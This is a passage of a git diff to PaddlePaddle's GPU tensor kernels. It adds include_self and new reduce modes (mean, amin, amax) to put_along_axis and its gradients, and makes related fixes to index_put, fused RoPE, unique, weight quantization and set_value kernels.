gpu_scatter_mul_min_max_input_grad_kernel(phi::DenseTensor self UNUSED, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out, + const phi::DenseTensor& x, + const phi::DenseTensor& value, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self, + const phi::DeviceContext& ctx); + +template +void gpu_scatter_mean_input_grad_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor grad, + bool 
include_self, + const phi::DeviceContext& ctx); + template void gpu_scatter_value_grad_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor grad, + bool include_self, const phi::DeviceContext& ctx); +template +void gpu_scatter_add_mean_value_grad_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out, + const phi::DenseTensor& x, + const phi::DenseTensor& value, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self, + const phi::DeviceContext& ctx); + +template +void gpu_scatter_mul_min_max_value_grad_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out, + const phi::DenseTensor& x, + const phi::DenseTensor& value, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self, + const phi::DeviceContext& ctx); + } // namespace funcs } // namespace phi diff --git a/paddle/phi/kernels/funcs/index_put_utils.h b/paddle/phi/kernels/funcs/index_put_utils.h index c81f716d0658b3..85aabb2adf3cd2 100644 --- a/paddle/phi/kernels/funcs/index_put_utils.h +++ b/paddle/phi/kernels/funcs/index_put_utils.h @@ -76,67 +76,73 @@ std::vector DealWithBoolIndices( const Context& dev_ctx, const std::vector& indices_v, std::vector* tmp_indices_v) { - std::vector res(indices_v.begin(), indices_v.end()); - bool contains_bool_tensor = false; + std::vector res; + bool contains_bool_tensor = false; for (size_t i = 0; i < indices_v.size(); ++i) { if (indices_v[i]->dtype() == phi::DataType::BOOL) { contains_bool_tensor = true; - int rank = indices_v[i]->dims().size(); - PADDLE_ENFORCE_GE( - rank, - 1UL, - phi::errors::InvalidArgument("the only bool tensor in indices should " - "have number of dimension at least 1")); - phi::DenseTensor nonzero_indices(phi::DataType::INT64); - nonzero_indices.Resize(common::make_ddim({-1, rank})); - NonZeroKernel(dev_ctx, *indices_v[i], &nonzero_indices); - - if (nonzero_indices.numel() == 0) { - std::vector empty_indices; - return empty_indices; - } + break; + } + } - std::vector integer_indices(rank, nullptr); - const int tmp_ix = tmp_indices_v->size(); - for (int i = 0; i < rank; ++i) { - tmp_indices_v->emplace_back( - DenseTensor(phi::DataType::INT64) - .Resize(common::make_ddim({nonzero_indices.dims()[0]}))); - } - for (int i = 0; i < rank; ++i) { - integer_indices[i] = &((*tmp_indices_v)[i + tmp_ix]); - } - SplitWithNumKernel( - dev_ctx, nonzero_indices, rank, 1, integer_indices); + if (contains_bool_tensor) { + for (size_t i = 0; i < indices_v.size(); ++i) { + if (indices_v[i]->dtype() == phi::DataType::BOOL) { + int rank = indices_v[i]->dims().size(); + PADDLE_ENFORCE_GE(rank, + 1UL, + phi::errors::InvalidArgument( + "the only bool tensor in indices should " + "have number of dimension at least 1")); + phi::DenseTensor nonzero_indices(phi::DataType::INT64); + nonzero_indices.Resize(common::make_ddim({-1, rank})); + NonZeroKernel(dev_ctx, *indices_v[i], &nonzero_indices); + + if (nonzero_indices.numel() == 0) { + std::vector empty_indices; + return empty_indices; + } + + std::vector integer_indices(rank, nullptr); + const int tmp_ix = tmp_indices_v->size(); + for (int i = 0; i < rank; ++i) { + tmp_indices_v->emplace_back( + DenseTensor(phi::DataType::INT64) + .Resize(common::make_ddim({nonzero_indices.dims()[0]}))); + } + for (int i = 0; i < rank; ++i) { + integer_indices[i] = &((*tmp_indices_v)[i + tmp_ix]); + } + SplitWithNumKernel( + dev_ctx, nonzero_indices, rank, 1, integer_indices); #ifdef PADDLE_WITH_XPU - auto 
place = dev_ctx.GetPlace(); - if (place.GetType() == phi::AllocationType::XPU) { - auto& pool = phi::DeviceContextPool::Instance(); - auto* xpu_ctx = static_cast(pool.Get(place)); - if (xpu_ctx->x_context()->xpu_stream) { - dev_ctx.Wait(); + auto place = dev_ctx.GetPlace(); + if (place.GetType() == phi::AllocationType::XPU) { + auto& pool = phi::DeviceContextPool::Instance(); + auto* xpu_ctx = static_cast(pool.Get(place)); + if (xpu_ctx->x_context()->xpu_stream) { + dev_ctx.Wait(); + } } - } #endif - } else if ((indices_v[i]->dtype() == phi::DataType::INT64) || - (indices_v[i]->dtype() == phi::DataType::INT32)) { - tmp_indices_v->emplace_back(*indices_v[i]); - } else { - PADDLE_THROW(phi::errors::InvalidArgument( - "data type of tensor in indices must be int32, int64 or bool")); + } else if ((indices_v[i]->dtype() == phi::DataType::INT64) || + (indices_v[i]->dtype() == phi::DataType::INT32)) { + tmp_indices_v->emplace_back(*indices_v[i]); + } else { + PADDLE_THROW(phi::errors::InvalidArgument( + "data type of tensor in indices must be int32, int64 or bool")); + } } - } - if (contains_bool_tensor) { - std::vector res_tmp(tmp_indices_v->size(), - nullptr); - for (size_t i = 0; i < res_tmp.size(); ++i) { - res_tmp[i] = &((*tmp_indices_v)[i]); + + res.reserve(tmp_indices_v->size()); + for (size_t i = 0; i < tmp_indices_v->size(); ++i) { + res.emplace_back(&((*tmp_indices_v)[i])); } - res.swap(res_tmp); + } else { + res = indices_v; } - return res; } @@ -215,62 +221,50 @@ void DealWithIndices(const Context& dev_ctx, res_dim_v->insert(res_dim_v->end(), tmp_x_dims.begin() + int_indices_v.size(), tmp_x_dims.end()); - - std::vector reshaped_indices_v; + phi::DDim res_dim = common::make_ddim(*res_dim_v); for (size_t i = 0; i < int_indices_v.size(); ++i) { + phi::DenseTensor index_tensor; if (int_indices_v[i]->dtype() == phi::DataType::INT32) { - reshaped_indices_v.emplace_back(phi::Cast( - dev_ctx, *int_indices_v[i], phi::DataType::INT64)); + index_tensor = phi::Cast( + dev_ctx, *int_indices_v[i], phi::DataType::INT64); } else { - reshaped_indices_v.emplace_back(*int_indices_v[i]); + index_tensor = *int_indices_v[i]; } + tmp_res_indices_v->emplace_back( + GetReshapeAndExpandTensor( + dev_ctx, index_tensor, res_dim, bd_dim, 0)); } - reshaped_indices_v.insert( - reshaped_indices_v.end(), range_tensor_v.begin(), range_tensor_v.end()); - - phi::DDim res_dim = common::make_ddim(*res_dim_v); - - for (size_t i = 0; i < reshaped_indices_v.size(); ++i) { + for (size_t i = 0; i < range_tensor_v.size(); ++i) { tmp_res_indices_v->emplace_back( GetReshapeAndExpandTensor( - dev_ctx, - reshaped_indices_v[i], - res_dim, - bd_dim, - ((i < int_indices_v.size()) - ? 
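The refactor keeps the original behaviour of DealWithBoolIndices: a boolean mask index is converted into the coordinates of its true elements, one integer column per mask dimension, and an empty result short-circuits the indexing. A host-side sketch of that conversion for a small 2-D mask:

#include <cstdio>
#include <vector>

int main() {
  const int rows = 2, cols = 3;
  bool mask[rows][cols] = {{false, true, false}, {true, false, true}};

  // "nonzero": one int64 column per mask dimension, one row per true entry.
  std::vector<long long> dim0, dim1;
  for (int r = 0; r < rows; ++r)
    for (int c = 0; c < cols; ++c)
      if (mask[r][c]) {
        dim0.push_back(r);
        dim1.push_back(c);
      }

  for (size_t i = 0; i < dim0.size(); ++i)
    printf("(%lld, %lld)\n", dim0[i], dim1[i]);  // (0,1) (1,0) (1,2)
  return 0;
}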
0 - : i - int_indices_v.size() + len_bd_dim))); + dev_ctx, range_tensor_v[i], res_dim, bd_dim, i + len_bd_dim)); } for (size_t i = 0; i < res_indices_v->size(); ++i) { (*res_indices_v)[i] = &(*tmp_res_indices_v)[i]; } } else { - std::vector int_indices_v_tmp; - for (size_t i = 0; i < int_indices_v.size(); ++i) { + phi::DenseTensor index_tensor; + phi::DenseTensor expand_index; if (int_indices_v[i]->dtype() == phi::DataType::INT32) { - int_indices_v_tmp.emplace_back(phi::Cast( - dev_ctx, *int_indices_v[i], phi::DataType::INT64)); + index_tensor = phi::Cast( + dev_ctx, *int_indices_v[i], phi::DataType::INT64); } else { - int_indices_v_tmp.emplace_back(*int_indices_v[i]); + index_tensor = *int_indices_v[i]; } - } - - for (size_t i = 0; i < int_indices_v.size(); ++i) { if (bd_dim != int_indices_v[i]->dims()) { - tmp_res_indices_v->emplace_back( - DenseTensor(phi::DataType::INT64).Resize(bd_dim)); + expand_index = DenseTensor(phi::DataType::INT64).Resize(bd_dim); ExpandKernel( dev_ctx, - int_indices_v_tmp[i], + index_tensor, IntArray(common::vectorize(bd_dim)), - &(*tmp_res_indices_v)[i]); + &expand_index); } else { - tmp_res_indices_v->emplace_back(int_indices_v_tmp[i]); + expand_index = index_tensor; } + tmp_res_indices_v->emplace_back(expand_index); } - for (size_t i = 0; i < res_indices_v->size(); ++i) { (*res_indices_v)[i] = &(*tmp_res_indices_v)[i]; } diff --git a/paddle/phi/kernels/fusion/gpu/fused_rope_utils.h b/paddle/phi/kernels/fusion/gpu/fused_rope_utils.h index 972f5ee633bbb0..0db16ffb7e20bc 100644 --- a/paddle/phi/kernels/fusion/gpu/fused_rope_utils.h +++ b/paddle/phi/kernels/fusion/gpu/fused_rope_utils.h @@ -125,10 +125,18 @@ __global__ void VectorizedFusedRopeWithRotateEveryTwoKernel( MPType p0 = static_cast(input[pr_index]); MPType p1 = static_cast(input[ls_index]); - result[pr_index] = - cos_value[pr_index] * p0 - sign * sin_value[ls_index] * p1; - result[ls_index] = - cos_value[ls_index] * p1 + sign * sin_value[pr_index] * p0; + if (sign == 1) { + result[pr_index] = cos_value[pr_index] * p0; + result[pr_index] -= sin_value[pr_index] * p1; + + result[ls_index] = sin_value[ls_index] * p0; + result[ls_index] += cos_value[ls_index] * p1; + } else if (sign == -1) { + result[pr_index] = + cos_value[pr_index] * p0 + sin_value[ls_index] * p1; + result[ls_index] = + cos_value[ls_index] * p1 - sin_value[pr_index] * p0; + } store[pr_index] = static_cast(result[pr_index]); store[ls_index] = static_cast(result[ls_index]); diff --git a/paddle/phi/kernels/gpu/cum_maxmin_grad_kernel.cu b/paddle/phi/kernels/gpu/cum_maxmin_grad_kernel.cu index f8dc67f5bafe88..d7341e55e23490 100644 --- a/paddle/phi/kernels/gpu/cum_maxmin_grad_kernel.cu +++ b/paddle/phi/kernels/gpu/cum_maxmin_grad_kernel.cu @@ -39,10 +39,10 @@ void CummaxGradKernel(const Context& dev_ctx, if (dtype == DataType::INT32) { phi::funcs::gpu_scatter_add_kernel( - *x_grad, axis, indices, out_grad, dev_ctx); + *x_grad, axis, indices, out_grad, true, dev_ctx); } else if (dtype == DataType::INT64) { phi::funcs::gpu_scatter_add_kernel( - *x_grad, axis, indices, out_grad, dev_ctx); + *x_grad, axis, indices, out_grad, true, dev_ctx); } } @@ -63,10 +63,10 @@ void CumminGradKernel(const Context& dev_ctx, if (dtype == DataType::INT32) { phi::funcs::gpu_scatter_add_kernel( - *x_grad, axis, indices, out_grad, dev_ctx); + *x_grad, axis, indices, out_grad, true, dev_ctx); } else if (dtype == DataType::INT64) { phi::funcs::gpu_scatter_add_kernel( - *x_grad, axis, indices, out_grad, dev_ctx); + *x_grad, axis, indices, out_grad, true, dev_ctx); } } 
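The rewritten rotate-every-two branch makes the sign convention explicit: sign == 1 rotates each (p0, p1) pair by the cached angle, and sign == -1 (the backward direction) applies the inverse rotation. A scalar sketch showing that the two cases undo each other:

#include <cmath>
#include <cstdio>

// Forward: (p0, p1) -> (c*p0 - s*p1, s*p0 + c*p1); backward uses the
// transposed rotation, (c*p0 + s*p1, c*p1 - s*p0).
void rotate_pair(float c, float s, float p0, float p1, int sign,
                 float* r0, float* r1) {
  if (sign == 1) {
    *r0 = c * p0 - s * p1;
    *r1 = s * p0 + c * p1;
  } else {  // sign == -1
    *r0 = c * p0 + s * p1;
    *r1 = c * p1 - s * p0;
  }
}

int main() {
  float theta = 0.3f, c = std::cos(theta), s = std::sin(theta);
  float p0 = 1.f, p1 = 2.f, q0, q1, b0, b1;
  rotate_pair(c, s, p0, p1, /*sign=*/1, &q0, &q1);
  rotate_pair(c, s, q0, q1, /*sign=*/-1, &b0, &b1);
  printf("%f %f\n", b0, b1);  // rotating forward then backward recovers 1, 2
  return 0;
}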
diff --git a/paddle/phi/kernels/gpu/put_along_axis_grad_kernel.cu b/paddle/phi/kernels/gpu/put_along_axis_grad_kernel.cu index d86e0493786ebd..c70812b473ee62 100644 --- a/paddle/phi/kernels/gpu/put_along_axis_grad_kernel.cu +++ b/paddle/phi/kernels/gpu/put_along_axis_grad_kernel.cu @@ -27,9 +27,12 @@ template void PutAlongAxisGradKernel(const Context& dev_ctx, const DenseTensor& x, const DenseTensor& index, + const DenseTensor& value, + const DenseTensor& out, const DenseTensor& out_grad, int axis, const std::string& reduce, + bool include_self, DenseTensor* x_grad, DenseTensor* value_grad) { PADDLE_ENFORCE_EQ(dev_ctx.GetPlace().GetType() == phi::AllocationType::GPU, @@ -40,23 +43,118 @@ void PutAlongAxisGradKernel(const Context& dev_ctx, const auto& index_type = index.dtype(); if (x_grad) { phi::Copy(dev_ctx, out_grad, dev_ctx.GetPlace(), false, x_grad); - if (index_type == DataType::INT32) { - phi::funcs::gpu_scatter_input_grad_kernel( - out_grad, axis, index, *x_grad, dev_ctx); - } else { - phi::funcs::gpu_scatter_input_grad_kernel( - out_grad, axis, index, *x_grad, dev_ctx); + if (!include_self || reduce == "assign") { + if (index_type == DataType::INT32) { + phi::funcs::gpu_scatter_input_grad_kernel( + out_grad, axis, index, *x_grad, include_self, dev_ctx); + } else { + phi::funcs::gpu_scatter_input_grad_kernel( + out_grad, axis, index, *x_grad, include_self, dev_ctx); + } + } else if (reduce == "multiply" || reduce == "mul" || reduce == "amin" || + reduce == "amax") { + if (index_type == DataType::INT32) { + phi::funcs::gpu_scatter_mul_min_max_input_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *x_grad, + reduce, + include_self, + dev_ctx); + } else { + phi::funcs::gpu_scatter_mul_min_max_input_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *x_grad, + reduce, + include_self, + dev_ctx); + } + } else if (reduce == "mean") { + if (index_type == DataType::INT32) { + phi::funcs::gpu_scatter_mean_input_grad_kernel( + out_grad, axis, index, *x_grad, include_self, dev_ctx); + } else { + phi::funcs::gpu_scatter_mean_input_grad_kernel( + out_grad, axis, index, *x_grad, include_self, dev_ctx); + } } } if (value_grad) { value_grad->Resize(index.dims()); dev_ctx.template Alloc(value_grad); - if (index_type == DataType::INT32) { - phi::funcs::gpu_scatter_value_grad_kernel( - out_grad, axis, index, *value_grad, dev_ctx); - } else { - phi::funcs::gpu_scatter_value_grad_kernel( - out_grad, axis, index, *value_grad, dev_ctx); + auto* grad_data = value_grad->data(); + int64_t grad_size = value_grad->numel(); + cudaMemset(grad_data, 0, sizeof(T) * grad_size); + if (reduce == "assign") { + if (index_type == DataType::INT32) { + phi::funcs::gpu_scatter_value_grad_kernel( + out_grad, axis, index, *value_grad, include_self, dev_ctx); + } else if (index_type == DataType::INT64) { + phi::funcs::gpu_scatter_value_grad_kernel( + out_grad, axis, index, *value_grad, include_self, dev_ctx); + } + } else if (reduce == "add" || reduce == "mean") { + if (index_type == DataType::INT32) { + phi::funcs::gpu_scatter_add_mean_value_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *value_grad, + reduce, + include_self, + dev_ctx); + } else { + phi::funcs::gpu_scatter_add_mean_value_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *value_grad, + reduce, + include_self, + dev_ctx); + } + } else if (reduce == "mul" || reduce == "multiply" || reduce == "amin" || + reduce == "amax") { + if (index_type == DataType::INT32) { + 
phi::funcs::gpu_scatter_mul_min_max_value_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *value_grad, + reduce, + include_self, + dev_ctx); + } else { + phi::funcs::gpu_scatter_mul_min_max_value_grad_kernel( + out_grad, + axis, + index, + out, + x, + value, + *value_grad, + reduce, + include_self, + dev_ctx); + } } } } diff --git a/paddle/phi/kernels/gpu/put_along_axis_kernel.cu b/paddle/phi/kernels/gpu/put_along_axis_kernel.cu index b63047973e9b82..aff4eec7bff8dd 100644 --- a/paddle/phi/kernels/gpu/put_along_axis_kernel.cu +++ b/paddle/phi/kernels/gpu/put_along_axis_kernel.cu @@ -30,6 +30,7 @@ void PutAlongAxisKernel(const Context& dev_ctx, const DenseTensor& value, int axis, const std::string& reduce, + bool include_self, DenseTensor* out) { PADDLE_ENFORCE_EQ(dev_ctx.GetPlace().GetType() == phi::AllocationType::GPU, true, @@ -42,31 +43,56 @@ void PutAlongAxisKernel(const Context& dev_ctx, if (reduce == "add") { if (index_type == DataType::INT32) { phi::funcs::gpu_scatter_add_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, include_self, dev_ctx); } else if (index_type == DataType::INT64) { phi::funcs::gpu_scatter_add_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, include_self, dev_ctx); } } else if (reduce == "multiply" || reduce == "mul") { if (index_type == DataType::INT32) { phi::funcs::gpu_scatter_mul_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, include_self, dev_ctx); } else if (index_type == DataType::INT64) { phi::funcs::gpu_scatter_mul_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, include_self, dev_ctx); } } else if (reduce == "assign") { if (index_type == DataType::INT32) { phi::funcs::gpu_scatter_assign_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, include_self, dev_ctx); } else if (index_type == DataType::INT64) { phi::funcs::gpu_scatter_assign_kernel( - *out, axis, index, value, dev_ctx); + *out, axis, index, value, include_self, dev_ctx); + } + } else if (reduce == "mean") { + if (index_type == DataType::INT32) { + phi::funcs::gpu_scatter_mean_kernel( + *out, axis, index, value, include_self, dev_ctx); + } else if (index_type == DataType::INT64) { + phi::funcs::gpu_scatter_mean_kernel( + *out, axis, index, value, include_self, dev_ctx); + } + } else if (reduce == "amax") { + if (index_type == DataType::INT32) { + phi::funcs::gpu_scatter_max_kernel( + *out, axis, index, value, include_self, dev_ctx); + } else if (index_type == DataType::INT64) { + phi::funcs::gpu_scatter_max_kernel( + *out, axis, index, value, include_self, dev_ctx); + } + } else if (reduce == "amin") { + if (index_type == DataType::INT32) { + phi::funcs::gpu_scatter_min_kernel( + *out, axis, index, value, include_self, dev_ctx); + } else if (index_type == DataType::INT64) { + phi::funcs::gpu_scatter_min_kernel( + *out, axis, index, value, include_self, dev_ctx); } } else { PADDLE_THROW(errors::InvalidArgument( "can not support reduce: '%s' for scatter kernel, only " - "support reduce op: 'add', 'assign', 'mul' and 'multiply', the " + "support reduce op: 'add', 'assign', 'mul', 'mean', 'amin', 'amax' and " + "'multiply', the " "default reduce op is 'assign' ", reduce)); return; diff --git a/paddle/phi/kernels/gpu/repeat_interleave_grad_kernel.cu b/paddle/phi/kernels/gpu/repeat_interleave_grad_kernel.cu index 52a0e313398e8b..5ff1418b2732ad 100644 --- a/paddle/phi/kernels/gpu/repeat_interleave_grad_kernel.cu +++ 
b/paddle/phi/kernels/gpu/repeat_interleave_grad_kernel.cu @@ -25,7 +25,8 @@ PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index_grad, float, double, int, - int64_t) {} + int64_t, + phi::dtype::bfloat16) {} PD_REGISTER_KERNEL(repeat_interleave_grad, GPU, ALL_LAYOUT, @@ -33,4 +34,5 @@ PD_REGISTER_KERNEL(repeat_interleave_grad, float, double, int, - int64_t) {} + int64_t, + phi::dtype::bfloat16) {} diff --git a/paddle/phi/kernels/gpu/repeat_interleave_kernel.cu b/paddle/phi/kernels/gpu/repeat_interleave_kernel.cu index ed62278f067e5f..7b0675b3a752df 100644 --- a/paddle/phi/kernels/gpu/repeat_interleave_kernel.cu +++ b/paddle/phi/kernels/gpu/repeat_interleave_kernel.cu @@ -25,7 +25,8 @@ PD_REGISTER_KERNEL(repeat_interleave, float, double, int, - int64_t) {} + int64_t, + phi::dtype::bfloat16) {} PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index, GPU, @@ -34,4 +35,5 @@ PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index, float, double, int, - int64_t) {} + int64_t, + phi::dtype::bfloat16) {} diff --git a/paddle/phi/kernels/gpu/set_value_grad_kernel.cu b/paddle/phi/kernels/gpu/set_value_grad_kernel.cu index 66688b417ae307..42ff5b912eccd0 100644 --- a/paddle/phi/kernels/gpu/set_value_grad_kernel.cu +++ b/paddle/phi/kernels/gpu/set_value_grad_kernel.cu @@ -35,3 +35,20 @@ PD_REGISTER_KERNEL(set_value_grad, phi::dtype::bfloat16, phi::dtype::complex, phi::dtype::complex) {} + +PD_REGISTER_KERNEL(set_value_with_scalar_grad, + GPU, + ALL_LAYOUT, + phi::SetValueWithScalarGradKernel, + float, + double, + int, + int64_t, + bool, + int16_t, + uint8_t, + int8_t, + phi::dtype::float16, + phi::dtype::bfloat16, + phi::dtype::complex, + phi::dtype::complex) {} diff --git a/paddle/phi/kernels/gpu/take_along_axis_grad_kernel.cu b/paddle/phi/kernels/gpu/take_along_axis_grad_kernel.cu index 6cea7592836730..5993b11f638db2 100644 --- a/paddle/phi/kernels/gpu/take_along_axis_grad_kernel.cu +++ b/paddle/phi/kernels/gpu/take_along_axis_grad_kernel.cu @@ -46,10 +46,11 @@ void TakeAlongAxisGradKernel(const Context& dev_ctx, axis, index, out_grad, + true, dev_ctx); // the gradient of gather is scatter } else if (index_type == DataType::INT64) { phi::funcs::gpu_scatter_add_kernel( - *x_grad, axis, index, out_grad, dev_ctx); + *x_grad, axis, index, out_grad, true, dev_ctx); } else { PADDLE_THROW( phi::errors::InvalidArgument("The data type of input index is expected " diff --git a/paddle/phi/kernels/gpu/take_along_axis_kernel.cu b/paddle/phi/kernels/gpu/take_along_axis_kernel.cu index ba4c6ba27e6824..ea32c056d4016a 100644 --- a/paddle/phi/kernels/gpu/take_along_axis_kernel.cu +++ b/paddle/phi/kernels/gpu/take_along_axis_kernel.cu @@ -33,9 +33,11 @@ void TakeAlongAxisKernel(const Context& dev_ctx, const auto& index_type = index.dtype(); if (index_type == DataType::INT32) { - phi::funcs::gpu_gather_kernel(x, axis, index, *out, dev_ctx); + phi::funcs::gpu_gather_kernel( + x, axis, index, *out, true, dev_ctx); } else if (index_type == DataType::INT64) { - phi::funcs::gpu_gather_kernel(x, axis, index, *out, dev_ctx); + phi::funcs::gpu_gather_kernel( + x, axis, index, *out, true, dev_ctx); } else { PADDLE_THROW( phi::errors::InvalidArgument("The data type of input index is expected " diff --git a/paddle/phi/kernels/gpu/top_p_sampling_kernel.cu b/paddle/phi/kernels/gpu/top_p_sampling_kernel.cu index 6a4ad710fff0e7..eea67fc676d6df 100644 --- a/paddle/phi/kernels/gpu/top_p_sampling_kernel.cu +++ b/paddle/phi/kernels/gpu/top_p_sampling_kernel.cu @@ -303,7 +303,7 @@ __device__ __forceinline__ void BlockReduce(Pair 
shared_max[], if (*beam >= MaxLength) break; } else { #ifdef PADDLE_WITH_HIP - uint64 mask = 0; + unsigned mask = 0u; mask = __ballot(true); if (tid_max / WARP_SIZE == wid) { if (__shfl_down(*beam, tid_max % WARP_SIZE, WARP_SIZE) == MaxLength) diff --git a/paddle/phi/kernels/gpu/unique_kernel.cu b/paddle/phi/kernels/gpu/unique_kernel.cu index e3c6f1bd4c9ef7..c37c8a820aefa9 100644 --- a/paddle/phi/kernels/gpu/unique_kernel.cu +++ b/paddle/phi/kernels/gpu/unique_kernel.cu @@ -26,7 +26,14 @@ #include #include +#ifdef PADDLE_WITH_CUDA +#include "cub/cub.cuh" +#elif defined(PADDLE_WITH_MUSA) #include "cub/cub.cuh" +#else +#include +namespace cub = hipcub; +#endif #include "paddle/phi/backends/gpu/gpu_context.h" #include "paddle/phi/common/memory_utils.h" #include "paddle/phi/core/kernel_registry.h" @@ -170,8 +177,11 @@ UniqueFlattendCUDATensor(const Context& context, #elif defined(PADDLE_WITH_MUSA) musaMemsetAsync(inv_loc_data_ptr, 0, sizeof(IndexT), context.stream()); #else - cudaMemsetAsync(inv_loc_data_ptr, 0, sizeof(IndexT), context.stream()); + thrust::device_ptr inv_loc_data_dev(inv_loc_data_ptr); + inv_loc_data_dev[0] = 0; // without device_ptr, segmentation fault #endif + +#ifdef PADDLE_WITH_HIP size_t temp_storage_bytes = 0; cub::DeviceScan::InclusiveSum(NULL, temp_storage_bytes, @@ -187,6 +197,12 @@ UniqueFlattendCUDATensor(const Context& context, inv_loc_data_ptr, num_input, context.stream()); +#else + thrust::inclusive_scan(exec_policy, + inv_loc_data_ptr, + inv_loc_data_ptr + num_input, + inv_loc_data_ptr); +#endif thrust::scatter(exec_policy, inv_loc_data_ptr, inv_loc_data_ptr + num_input, @@ -390,9 +406,11 @@ static void ComputeUniqueDims(const Context& context, // 3. counts: 'counts' counts->Resize(common::make_ddim({num_out})); auto* count_data = context.template Alloc(counts); - thrust::fill(exec_policy, count_data, count_data + row, 0); - thrust::adjacent_difference( - exec_policy, range_data_ptr + 1, range_data_ptr + row + 1, count_data); + thrust::fill(exec_policy, count_data, count_data + num_out, 0); + thrust::adjacent_difference(exec_policy, + range_data_ptr + 1, + range_data_ptr + num_out + 1, + count_data); } // Calculate unique when 'axis' is set diff --git a/paddle/phi/kernels/impl/set_value_grad_kernel_impl.h b/paddle/phi/kernels/impl/set_value_grad_kernel_impl.h index 3f78361b92b8bd..99f05f80c17ff7 100644 --- a/paddle/phi/kernels/impl/set_value_grad_kernel_impl.h +++ b/paddle/phi/kernels/impl/set_value_grad_kernel_impl.h @@ -341,4 +341,26 @@ void SetValueGradKernel(const Context& dev_ctx, } } +template +void SetValueWithScalarGradKernel(const Context& dev_ctx, + const DenseTensor& out_grad, + const IntArray& starts, + const IntArray& ends, + const IntArray& steps, + const std::vector& axes, + const std::vector& decrease_axes, + const std::vector& none_axes, + DenseTensor* x_grad) { + SetValueGradKernel(dev_ctx, + out_grad, + starts, + ends, + steps, + axes, + decrease_axes, + none_axes, + x_grad, + nullptr); +} + } // namespace phi diff --git a/paddle/phi/kernels/impl/weight_quantize_kernel_gpu_impl.h b/paddle/phi/kernels/impl/weight_quantize_kernel_gpu_impl.h index 5dafe445e2b461..201dd403270f36 100644 --- a/paddle/phi/kernels/impl/weight_quantize_kernel_gpu_impl.h +++ b/paddle/phi/kernels/impl/weight_quantize_kernel_gpu_impl.h @@ -105,6 +105,7 @@ void weight_permute_gpu(const GPUContext& dev_ctx, input_data, output_data, numel, total_k, total_n); } } + template __global__ void per_channel_quant_gpu(const T* weight_data, int8_t* quanted_weight_data, @@ -160,7 
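The unique kernel builds inverse indices with an inclusive scan over "new run starts" and per-value counts with an adjacent difference over run boundaries; the hunk above also fixes the count computation to iterate over num_out instead of row. A host-side sketch of the two steps using the standard library (thrust mirrors both calls on the device):

#include <cstdio>
#include <numeric>
#include <vector>

int main() {
  // Sorted input with duplicates.
  std::vector<int> sorted = {2, 2, 5, 7, 7, 7};

  // 1 where a new run starts, 0 otherwise; an inclusive scan then gives,
  // for each element, the index of the unique value it belongs to.
  std::vector<int> inv(sorted.size(), 0);
  for (size_t i = 1; i < sorted.size(); ++i)
    inv[i] = (sorted[i] != sorted[i - 1]) ? 1 : 0;
  std::partial_sum(inv.begin(), inv.end(), inv.begin());

  // Exclusive end position of each run; adjacent difference turns the
  // boundary positions into per-unique-value counts.
  std::vector<long long> ends = {2, 3, 6};
  std::vector<long long> counts(ends.size());
  std::adjacent_difference(ends.begin(), ends.end(), counts.begin());

  for (int v : inv) printf("%d ", v);             // 0 0 1 2 2 2
  printf("| ");
  for (long long c : counts) printf("%lld ", c);  // 2 1 3
  printf("\n");
  return 0;
}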
+161,6 @@ __global__ void per_channel_quant_gpu(const T* weight_data, } } } - template void weight_quant_gpu(const GPUContext& dev_ctx, const T* weight_data, @@ -174,8 +174,15 @@ void weight_quant_gpu(const GPUContext& dev_ctx, constexpr int kBlockSize = 64; constexpr int kWarpNum = kBlockSize / kWarpSize; constexpr int kVectorSize = 128 / sizeof(T) / 8; + PADDLE_ENFORCE_EQ(total_n % kVectorSize, + 0, + phi::errors::PreconditionNotMet( + "Currently, weight_quant_gpu kernel only support n " + "with multiple of %d, please use", + kVectorSize)); int vec_total_n = total_n / kVectorSize; - int kGridSize = max(vec_total_n / kBlockSize, static_cast(1)); + int kGridSize = + max((vec_total_n + kBlockSize - 1) / kBlockSize, static_cast(1)); per_channel_quant_gpu<<>>( weight_data, quanted_weight_data, scale_data, total_k, vec_total_n); } diff --git a/paddle/phi/kernels/put_along_axis_grad_kernel.h b/paddle/phi/kernels/put_along_axis_grad_kernel.h index 2141443da7ab17..07c39941ce8d83 100644 --- a/paddle/phi/kernels/put_along_axis_grad_kernel.h +++ b/paddle/phi/kernels/put_along_axis_grad_kernel.h @@ -24,9 +24,12 @@ template void PutAlongAxisGradKernel(const Context& dev_ctx, const DenseTensor& x, const DenseTensor& index, + const DenseTensor& value, + const DenseTensor& out, const DenseTensor& out_grad, int axis, const std::string& reduce, + bool include_self, DenseTensor* x_grad, DenseTensor* value_grad); diff --git a/paddle/phi/kernels/put_along_axis_kernel.h b/paddle/phi/kernels/put_along_axis_kernel.h index 797d0e364b48d4..c1cb13e607dd6e 100644 --- a/paddle/phi/kernels/put_along_axis_kernel.h +++ b/paddle/phi/kernels/put_along_axis_kernel.h @@ -27,6 +27,7 @@ void PutAlongAxisKernel(const Context& dev_ctx, const DenseTensor& value, int axis, const std::string& reduce, + bool include_self, DenseTensor* out); } // namespace phi diff --git a/paddle/phi/kernels/set_value_grad_kernel.h b/paddle/phi/kernels/set_value_grad_kernel.h index e4dad683e40a9d..04592cd2002d19 100644 --- a/paddle/phi/kernels/set_value_grad_kernel.h +++ b/paddle/phi/kernels/set_value_grad_kernel.h @@ -32,4 +32,14 @@ void 